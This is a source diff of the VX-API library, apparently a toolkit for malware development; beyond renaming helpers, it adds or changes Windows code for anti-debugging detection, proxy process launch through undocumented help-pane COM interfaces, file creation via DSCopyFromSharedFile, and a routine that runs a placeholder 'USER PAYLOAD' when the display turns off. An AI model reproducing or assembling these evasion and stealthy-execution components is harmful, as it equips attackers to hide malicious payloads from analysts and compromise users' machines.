+	__except (EXCEPTION_INVALID_HANDLE == GetExceptionCode() ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
+	{
+		return TRUE;
+	}
+
+	return FALSE;
+}

VX-API/AdfIsCreateProcessDebugEventCodeSet.cpp

@@ -0,0 +1,19 @@
+#include "Win32Helper.h"
+
+BOOL AdfIsCreateProcessDebugEventCodeSet(VOID)
+{
+	WCHAR FilePath[MAX_PATH * sizeof(WCHAR)] = { 0 };
+	HANDLE hHandle = INVALID_HANDLE_VALUE;
+
+	if (GetProcessPathFromProcessParametersW((MAX_PATH * sizeof(WCHAR)), FilePath) == 0)
+		return FALSE;
+
+	hHandle = CreateFileW(FilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, 0);
+	if (hHandle == INVALID_HANDLE_VALUE)
+		return TRUE;
+
+	if (hHandle)
+		CloseHandle(hHandle);
+
+	return FALSE;
+}

VX-API/AdfOpenProcessOnCsrss.cpp

@@ -1,10 +1,4 @@
-/*
-Some debuggers can be detected by using the kernel32!OpenProcess() function on the csrss.exe process. 
-The call will succeed only if the user for the process is a member of the administrators group and 
-has debug privileges.
-
-Credit: Checkpoint Research
-*/
+#include "Win32Helper.h"
 
 BOOL AdfOpenProcessOnCsrss(VOID)
 {
@@ -13,11 +7,11 @@ BOOL AdfOpenProcessOnCsrss(VOID)
 	CSRGETPROCESSID CsrGetProcessId = NULL;
 	HANDLE hCsrHandle = NULL;
 
-	hNtdll = RfGetModuleHandleW(L"ntdll.dll");
+	hNtdll = GetModuleHandleExW(L"ntdll.dll");
 	if (hNtdll == NULL)
 		return FALSE;
 
-	CsrGetProcessId = (CSRGETPROCESSID)RfGetProcAddressA((DWORD64)hNtdll, "CsrGetProcessId");
+	CsrGetProcessId = (CSRGETPROCESSID)GetProcAddressA((DWORD64)hNtdll, "CsrGetProcessId");
 	if (CsrGetProcessId == NULL)
 		return FALSE;
 
@@ -29,4 +23,4 @@ BOOL AdfOpenProcessOnCsrss(VOID)
 		CloseHandle(hCsrHandle);
 
 	return TRUE;
-}
+}

VX-API/CaplockString.cpp

@@ -1,3 +1,5 @@
+#include "StringManipulation.h"
+
 PCHAR CaplockStringA(PCHAR Ptr)
 {
 	PCHAR sv = Ptr;
@@ -22,4 +24,4 @@ PWCHAR CaplockStringW(PWCHAR Ptr)
 		sv++;
 	}
 	return Ptr;
-}
+}

VX-API/CharArrayToByteArray.cpp

@@ -1,3 +1,5 @@
+#include "StringManipulation.h"
+
 VOID CharArrayToByteArrayA(PCHAR Char, PBYTE Byte, DWORD Length)
 {
 	for (DWORD dwX = 0; dwX < Length; dwX++)
@@ -12,4 +14,4 @@ VOID CharArrayToByteArrayW(PWCHAR Char, PBYTE Byte, DWORD Length)
 	{
 		Byte[dwX] = (BYTE)Char[dwX];
 	}
-}
+}

VX-API/CharStringToWCharString.cpp

@@ -1,3 +1,5 @@
+#include "StringManipulation.h"
+
 SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed)
 {
 	INT Length = (INT)MaximumAllowed;
@@ -9,4 +11,4 @@ SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumA
 	}
 
 	return MaximumAllowed - Length;
-}
+}

VX-API/CheckRemoteDebuggerPresentEx.cpp

@@ -1,10 +1,6 @@
-/*
+#include "Win32Helper.h"
 
-Created via ReactOS and IDA
-
-Credit: smelly__vx
-*/
-BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
+BOOL CheckRemoteDebuggerPresentEx(HANDLE hHandle, PBOOL pbDebuggerPresent)
 {
 	typedef enum _PROCESSINFOCLASS
 	{
@@ -24,11 +20,11 @@ BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
 	if (hHandle == NULL)
 		return FALSE;
 
-	HMODULE hModule = RfGetModuleHandleW(L"ntdll.dll");
+	HMODULE hModule = GetModuleHandleExW(L"ntdll.dll");
 	if (hModule == NULL)
 		return FALSE;
 
-	NtQueryInformationProcess = (NTQUERYINFORMATIONPROCESS)RfGetProcAddressW((DWORD64)hModule, L"NtQueryInformationProcess");
+	NtQueryInformationProcess = (NTQUERYINFORMATIONPROCESS)GetProcAddressW((DWORD64)hModule, L"NtQueryInformationProcess");
 	if (!NtQueryInformationProcess)
 		return FALSE;
 
@@ -39,4 +35,4 @@ BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
 	*pbDebuggerPresent = TRUE;
 
 	return TRUE;
-}
+}

VX-API/CopyMemoryEx.cpp

@@ -1,10 +1,12 @@
-PVOID RfCopyMemory(PVOID Destination, CONST PVOID Source, SIZE_T Length)
-{
-	PBYTE D = (PBYTE)Destination;
-	PBYTE S = (PBYTE)Source;
-
-	while (Length--)
-		*D++ = *S++;
-
-	return Destination;
-}
+#include "StringManipulation.h"
+
+PVOID CopyMemoryEx(PVOID Destination, CONST PVOID Source, SIZE_T Length)
+{
+	PBYTE D = (PBYTE)Destination;
+	PBYTE S = (PBYTE)Source;
+
+	while (Length--)
+		*D++ = *S++;
+
+	return Destination;
+}

VX-API/CreateFileFromDsCopyFromSharedFile.cpp

@@ -1,9 +1,5 @@
-/*
-FileToClone can be a path to any file. The file does not matter, but it must exist
-NewFileName is the file you want to create. It can named anything and in any dir you have permissions to create a file in
+#include "Win32Helper.h"
 
-Credit: Jonas Lyk
-*/
 BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
 {
 	typedef struct __DATA_SHARE_SCOPE_ENTRY {
@@ -25,7 +21,7 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
 	typedef HRESULT(WINAPI* DSCREATESHAREDFILETOKEN)(LPCWSTR, PDATA_SHARE_CTRL, INT, INT, WCHAR**);
 	typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
 
-	DATA_SHARE_CTRL Share; RfZeroMemory(&Share, sizeof(DATA_SHARE_CTRL));
+	DATA_SHARE_CTRL Share; ZeroMemoryEx(&Share, sizeof(DATA_SHARE_CTRL));
 	LPWSTR SidString = NULL;
 	HANDLE hToken = NULL;
 	DSCREATESHAREDFILETOKEN DsCreateSharedFileToken = NULL;
@@ -39,8 +35,8 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
 	if (hDsClient == NULL)
 		return FALSE;
 
-	DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)RfGetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
-	DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)RfGetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
+	DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)GetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
+	DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)GetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
 
 	if (!DsCreateSharedFileToken || !DsCopyFromSharedFile)
 		goto EXIT_ROUTINE;
@@ -66,10 +62,10 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
 EXIT_ROUTINE:
 
 	if (!bFlag)
-		dwError = EhGetLastError();
+		dwError = GetLastErrorEx();
 
 	if (SidString)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, SidString);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, SidString);
 
 	if (hToken)
 		CloseHandle(hToken);
@@ -98,7 +94,7 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
 	typedef HRESULT(WINAPI* DSCREATESHAREDFILETOKEN)(LPCWSTR, PDATA_SHARE_CTRL, INT, INT, WCHAR**);
 	typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
 
-	DATA_SHARE_CTRL Share; RfZeroMemory(&Share, sizeof(DATA_SHARE_CTRL));
+	DATA_SHARE_CTRL Share; ZeroMemoryEx(&Share, sizeof(DATA_SHARE_CTRL));
 	LPWSTR SidString = NULL;
 	HANDLE hToken = NULL;
 	DSCREATESHAREDFILETOKEN DsCreateSharedFileToken = NULL;
@@ -121,8 +117,8 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
 	if (hDsClient == NULL)
 		return FALSE;
 
-	DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)RfGetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
-	DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)RfGetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
+	DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)GetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
+	DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)GetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
 
 	if (!DsCreateSharedFileToken || !DsCopyFromSharedFile)
 		goto EXIT_ROUTINE;
@@ -148,13 +144,13 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
 EXIT_ROUTINE:
 
 	if (!bFlag)
-		dwError = EhGetLastError();
+		dwError = GetLastErrorEx();
 
 	if (SidString)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, SidString);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, SidString);
 
 	if (hToken)
 		CloseHandle(hToken);
 
 	return bFlag;
-}
+}

VX-API/CreateLocalAppDataObjectPath.cpp

@@ -1,16 +1,11 @@
-/*
+#include "Win32Helper.h"
 
-pBuffer == OUT
-Path == concatted, must have \\ in front i.e. L"\\File.exe"
-
-Credit: smelly__vx
-*/
 BOOL CreateLocalAppDataObjectPathW(PWCHAR pBuffer, PWCHAR Path, DWORD Size, BOOL bDoesObjectExist)
 {
 	if (pBuffer == NULL)
 		return FALSE;
 
-	if (RfGetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)
+	if (GetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)
 		return FALSE;
 
 	if (StringConcatW(pBuffer, Path) == 0)
@@ -30,7 +25,7 @@ BOOL CreateLocalAppDataObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL b
 	if (pBuffer == NULL)
 		return FALSE;
 
-	if (RfGetEnvironmentVariableA("LOCALAPPDATA", pBuffer, Size) == 0)
+	if (GetEnvironmentVariableA("LOCALAPPDATA", pBuffer, Size) == 0)
 		return FALSE;
 
 	if (StringConcatA(pBuffer, Path) == 0)

VX-API/CreateProcessFromIHxHelpPaneServer.cpp

@@ -0,0 +1,94 @@
+#include "Win32Helper.h"
+
+struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}"))
+	IHxHelpPaneServer : public IUnknown {
+	virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
+	virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
+	virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
+	virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
+};
+
+HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid)
+{
+	HRESULT Result = S_OK;
+
+	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
+		return Result;
+
+	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
+		return Result;
+
+	return Result;
+}
+
+HRESULT CreateProcessFromIHxHelpPaneServerW(PWCHAR UriFile)
+{
+	HRESULT Result = S_OK;
+	GUID CLSID_IHxHelpPaneServer;
+	GUID IID_IHxHelpPaneServer;
+
+	IHxHelpPaneServer* Help = NULL;
+
+	if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
+		return Win32FromHResult(Result);
+
+	Result = Help->Execute(UriFile);
+
+	if (Help)
+		Help->Release();
+
+	CoUninitialize();
+
+	return Win32FromHResult(Result);
+}
+
+HRESULT CreateProcessFromIHxHelpPaneServerA(PCHAR UriFile)
+{
+	HRESULT Result = S_OK;
+	GUID CLSID_IHxHelpPaneServer;
+	GUID IID_IHxHelpPaneServer;
+	IHxHelpPaneServer* Help = NULL;
+	PWCHAR wUriFile = NULL;
+	DWORD dwLength = 0;
+
+	if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
+		return Win32FromHResult(Result);
+
+	dwLength = (DWORD)StringLengthA(UriFile);
+	if (dwLength == 0)
+		goto EXIT_ROUTINE;
+
+	wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);
+	if (wUriFile == NULL)
+		goto EXIT_ROUTINE;
+
+	if (CharStringToWCharString(wUriFile, UriFile, dwLength) == 0)
+		goto EXIT_ROUTINE;
+
+	Result = Help->Execute(wUriFile);
+
+EXIT_ROUTINE:
+
+	if (Help)
+		Help->Release();
+
+	if (wUriFile)
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, wUriFile);
+
+	CoUninitialize();
+
+	return Win32FromHResult(Result);
+
+}

VX-API/CreateProcessFromIHxInteractiveUser.cpp

@@ -0,0 +1,89 @@
+#include "Win32Helper.h"
+
+struct __declspec(uuid("8cec595b-07a1-11d9-b15e-000d56bfe6ee"))
+	IHxInteractiveUser : public IUnknown {
+	virtual VOID __stdcall Execute(PWCHAR pcUrl) = 0;
+};
+
+HRESULT CoInitializeIHxInteractiveUserIds(LPGUID Clsid, LPGUID Iid)
+{
+	HRESULT Result = S_OK;
+
+	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58e7-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
+		return Result;
+
+	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec595b-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
+		return Result;
+
+	return Result;
+}
+
+HRESULT CreateProcessFromIHxInteractiveUserW(PWCHAR UriFile)
+{
+	HRESULT Result = S_OK;
+	GUID CLSID_IHxInteractiveUser;
+	GUID IID_IHxInteractiveUser;
+	IHxInteractiveUser* User = NULL;
+
+	if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
+		return Win32FromHResult(Result);
+
+	User->Execute(UriFile);
+
+	if (User)
+		User->Release();
+
+	CoUninitialize();
+
+	return Win32FromHResult(Result);
+}
+
+HRESULT CreateProcessFromIHxInteractiveUserA(PCHAR UriFile)
+{
+	HRESULT Result = S_OK;
+	GUID CLSID_IHxInteractiveUser;
+	GUID IID_IHxInteractiveUser;
+	IHxInteractiveUser* User = NULL;
+	PWCHAR wUriFile = NULL;
+	DWORD dwLength = 0;
+
+	if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
+		return Win32FromHResult(Result);
+
+	if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
+		return Win32FromHResult(Result);
+
+	dwLength = (DWORD)StringLengthA(UriFile);
+	if (dwLength == 0)
+		goto EXIT_ROUTINE;
+
+	wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);
+	if(wUriFile == NULL)
+		goto EXIT_ROUTINE;
+
+	if (CharStringToWCharString(wUriFile, UriFile, dwLength + 1) == 0)
+		goto EXIT_ROUTINE;
+
+	User->Execute(wUriFile);
+
+EXIT_ROUTINE:
+
+	if (User)
+		User->Release();
+
+	if (wUriFile)
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, wUriFile);
+
+	CoUninitialize();
+
+	return Win32FromHResult(Result);
+}

VX-API/CreateProcessWithCfGuard.cpp

@@ -1,10 +1,4 @@
-/*
-must pass pointer of PPROCESS_INFORMATION to function, callee is responsible for closing handles
-eg 
-
-	CloseHandle(PihProcess);
-	CloseHandle(Pi.hThread);
-*/
+#include "Win32Helper.h"
 
 typedef struct _PROC_THREAD_ATTRIBUTE {
 	ULONG64 Attribute;
@@ -28,7 +22,7 @@ BOOL UnusedSubroutineInitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_L
 
 	if (dwFlags || (dwAttributeCount > 0x1B))
 	{
-		SetLastError(ERROR_INVALID_PARAMETER);
+		SetLastErrorEx(ERROR_INVALID_PARAMETER);
 		return bFlag;
 	}
 
@@ -43,7 +37,7 @@ BOOL UnusedSubroutineInitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_L
 		bFlag = TRUE;
 	}
 	else
-		SetLastError(ERROR_INSUFFICIENT_BUFFER);
+		SetLastErrorEx(ERROR_INSUFFICIENT_BUFFER);
 
 	*lpSize = dwSize;
 	return bFlag;
@@ -55,7 +49,7 @@ DWORD UnusedSubroutineGetProcThreadAttributeListSize(VOID)
 
 	UnusedSubroutineInitializeProcThreadAttributeList(NULL, 1, 0, &dwSize);
 
-	return dwSize;
+	return (DWORD)dwSize;
 }
 
 VOID UnusedSubroutineUpdateProcThreadAttribute(LPPROC_THREAD_ATTRIBUTE_LIST AttributeList, DWORD_PTR Attribute, PVOID Policy, SIZE_T Size)
@@ -80,23 +74,23 @@ BOOL CreateProcessWithCfGuardW(PPROCESS_INFORMATION Pi, PWCHAR Path)
 	SIZE_T dwAttributeSize = 0;
 	DWORD64 Policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
 
-	STARTUPINFOEXW Si; RfZeroMemory(&Si, sizeof(STARTUPINFOEXW));
+	STARTUPINFOEXW Si; ZeroMemoryEx(&Si, sizeof(STARTUPINFOEXW));
 	Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
-	RfZeroMemory(Pi, sizeof(PROCESS_INFORMATION));
+	ZeroMemoryEx(Pi, sizeof(PROCESS_INFORMATION));
 
 	dwAttributeSize = UnusedSubroutineGetProcThreadAttributeListSize();
 	if (dwAttributeSize == 0)
 		goto EXIT_ROUTINE;
 
-	ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwAttributeSize);
+	ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwAttributeSize);
 	if (ThreadAttributes == NULL)
 		goto EXIT_ROUTINE;
 
-	if(!UnusedSubroutineInitializeProcThreadAttributeList(ThreadAttributes, 1, 0, &dwAttributeSize))
+	if (!UnusedSubroutineInitializeProcThreadAttributeList(ThreadAttributes, 1, 0, &dwAttributeSize))
 		goto EXIT_ROUTINE;
 
 	UnusedSubroutineUpdateProcThreadAttribute(ThreadAttributes, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &Policy, sizeof(DWORD64));
-	
+
 	Si.lpAttributeList = ThreadAttributes;
 
 	if (!CreateProcessW(Path, NULL, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &Si.StartupInfo, Pi))
@@ -109,7 +103,7 @@ BOOL CreateProcessWithCfGuardW(PPROCESS_INFORMATION Pi, PWCHAR Path)
 EXIT_ROUTINE:
 
 	if (ThreadAttributes)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
 
 	return bFlag;
 }
@@ -121,15 +115,15 @@ BOOL CreateProcessWithCfGuardA(PPROCESS_INFORMATION Pi, PCHAR Path)
 	SIZE_T dwAttributeSize = 0;
 	DWORD64 Policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
 
-	STARTUPINFOEXA Si; RfZeroMemory(&Si, sizeof(STARTUPINFOEXA));
+	STARTUPINFOEXA Si; ZeroMemoryEx(&Si, sizeof(STARTUPINFOEXA));
 	Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
-	RfZeroMemory(Pi, sizeof(PROCESS_INFORMATION));
+	ZeroMemoryEx(Pi, sizeof(PROCESS_INFORMATION));
 
 	dwAttributeSize = UnusedSubroutineGetProcThreadAttributeListSize();
 	if (dwAttributeSize == 0)
 		goto EXIT_ROUTINE;
 
-	ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwAttributeSize);
+	ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwAttributeSize);
 	if (ThreadAttributes == NULL)
 		goto EXIT_ROUTINE;
 
@@ -150,7 +144,7 @@ BOOL CreateProcessWithCfGuardA(PPROCESS_INFORMATION Pi, PCHAR Path)
 EXIT_ROUTINE:
 
 	if (ThreadAttributes)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
 
 	return bFlag;
-}
+}

VX-API/CreatePseudoRandomInteger.cpp

@@ -1,11 +1,11 @@
-ULONG Next = 2; //seed
+#include "Win32Helper.h"
 
 INT PseudoRandomIntegerSubroutine(PULONG Context)
 {
 	return ((*Context = *Context * 1103515245 + 12345) % ((ULONG)RAND_MAX + 1));
 }
 
-INT CreatePseudoRandomInteger(VOID)
+INT CreatePseudoRandomInteger(ULONG Seed)
 {
-	return (PseudoRandomIntegerSubroutine(&Next));
-}
+	return (PseudoRandomIntegerSubroutine(&Seed));
+}

VX-API/CreatePseudoRandomString.cpp

@@ -1,4 +1,6 @@
-PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
+#include "Win32Helper.h"
+
+PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength, ULONG Seed)
 {
 	WCHAR DataSet[] = L"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
 	PWCHAR String = NULL;
@@ -11,7 +13,7 @@ PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
 #pragma warning (disable: 4018)
 	for (INT dwN = 0; dwN < dwLength; dwN++)
 	{
-		INT Key = CreatePseudoRandomInteger() % (INT)(StringLengthW(DataSet) - 1);
+		INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthW(DataSet) - 1);
 		String[dwN] = DataSet[Key];
 	}
 #pragma warning (pop)
@@ -24,7 +26,7 @@ PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
 	return String;
 }
 
-PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
+PCHAR CreatePseudoRandomStringA(SIZE_T dwLength, ULONG Seed)
 {
 	CHAR DataSet[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
 	PCHAR String = NULL;
@@ -37,7 +39,7 @@ PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
 #pragma warning (disable: 4018)
 	for (INT dwN = 0; dwN < dwLength; dwN++)
 	{
-		INT Key = CreatePseudoRandomInteger() % (INT)(StringLengthA(DataSet) - 1);
+		INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthA(DataSet) - 1);
 		String[dwN] = DataSet[Key];
 	}
 #pragma warning (pop)
@@ -48,4 +50,4 @@ PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
 #pragma warning (pop)
 
 	return String;
-}
+}

VX-API/CreateWindowsObjectPath.cpp

@@ -1,16 +1,11 @@
-/*
+#include "Win32Helper.h"
 
-pBuffer == OUT
-Path == concatted, must have \\ in front i.e. L"\\File.exe"
-
-Credit: smelly__vx
-*/
 BOOL CreateWindowsObjectPathW(PWCHAR pBuffer, PWCHAR Path, DWORD Size, BOOL bDoesObjectExist)
 {
 	if (pBuffer == NULL)
 		return FALSE;
 
-	if (!RfGetSystemWindowsDirectoryW(Size, pBuffer))
+	if (!GetSystemWindowsDirectoryW(Size, pBuffer))
 		return FALSE;
 
 	if (StringConcatW(pBuffer, Path) == 0)
@@ -30,7 +25,7 @@ BOOL CreateWindowsObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL bDoesO
 	if (pBuffer == NULL)
 		return FALSE;
 
-	if (!RfGetSystemWindowsDirectoryA(Size, pBuffer))
+	if (!GetSystemWindowsDirectoryA(Size, pBuffer))
 		return FALSE;
 
 	if (StringConcatA(pBuffer, Path) == 0)
@@ -43,4 +38,4 @@ BOOL CreateWindowsObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL bDoesO
 	}
 
 	return TRUE;
-}
+}

VX-API/DelayedExecutionExecuteOnDisplayOff.cpp

@@ -0,0 +1,82 @@
+#include "Win32Helper.h"
+
+#include "powrprof.h"
+
+typedef DWORD(WINAPI* POWERSETTINGREGISTERNOTIFICATION)(LPCGUID, DWORD, HANDLE, PHPOWERNOTIFY);
+typedef DWORD(WINAPI* POWERSETTINGUNREGISTERNOTIFICATION)(HPOWERNOTIFY);
+
+ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting);
+
+ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting)
+{
+	PPOWERBROADCAST_SETTING PowerSettings = (PPOWERBROADCAST_SETTING)Setting;
+
+	if (Type == PBT_POWERSETTINGCHANGE && PowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE)
+	{
+		switch (*PowerSettings->Data)
+		{
+			case 0x0:
+			case 0x1:
+				break;
+
+			case 0x2:
+			{
+				//USER PAYLOAD HERE
+				break;
+			}
+
+			default:
+				break;
+		}
+	}
+
+	return ERROR_SUCCESS;
+}
+
+BOOL DelayedExecutionExecuteOnDisplayOff(VOID)
+{
+	DWORD dwError = ERROR_SUCCESS;
+	HMODULE hLibrary;
+	POWERSETTINGREGISTERNOTIFICATION _PowerSettingRegisterNotification = NULL;
+	POWERSETTINGUNREGISTERNOTIFICATION _PowerSettingUnregisterNotification = NULL;
+	DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS NotificationsParameters;
+	HANDLE hNotificationRegister = NULL;
+
+	hLibrary = LoadLibrary(L"powrprof.dll");
+	if (hLibrary == NULL)
+		goto FAILURE;
+
+	_PowerSettingRegisterNotification = (POWERSETTINGREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingRegisterNotification");
+	_PowerSettingUnregisterNotification = (POWERSETTINGUNREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingUnregisterNotification");
+
+	if (!_PowerSettingRegisterNotification || !_PowerSettingUnregisterNotification)
+		goto FAILURE;
+
+	NotificationsParameters.Callback = HandlePowerNotifications;
+	NotificationsParameters.Context = NULL;
+
+	if (_PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK,
+		(HANDLE)&NotificationsParameters, &hNotificationRegister) != ERROR_SUCCESS)
+	{
+		goto FAILURE;
+	}
+
+	if (SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED) == NULL)
+		goto FAILURE;
+
+	while (1) { Sleep(100); }
+
+	if (hNotificationRegister)
+		_PowerSettingUnregisterNotification(hNotificationRegister);
+
+	return ERROR_SUCCESS;
+
+FAILURE:
+
+	dwError = GetLastError();
+
+	if (hNotificationRegister)
+		_PowerSettingUnregisterNotification(hNotificationRegister);
+
+	return dwError;
+}

VX-API/DeleteFileEx.cpp

@@ -1,4 +1,6 @@
-BOOL RfDeleteFileA(PCHAR Path)
+#include "Win32Helper.h"
+
+BOOL DeleteFileExA(PCHAR Path)
 {
 	HANDLE hHandle = INVALID_HANDLE_VALUE;
 
@@ -17,7 +19,7 @@ BOOL RfDeleteFileA(PCHAR Path)
 	return TRUE;
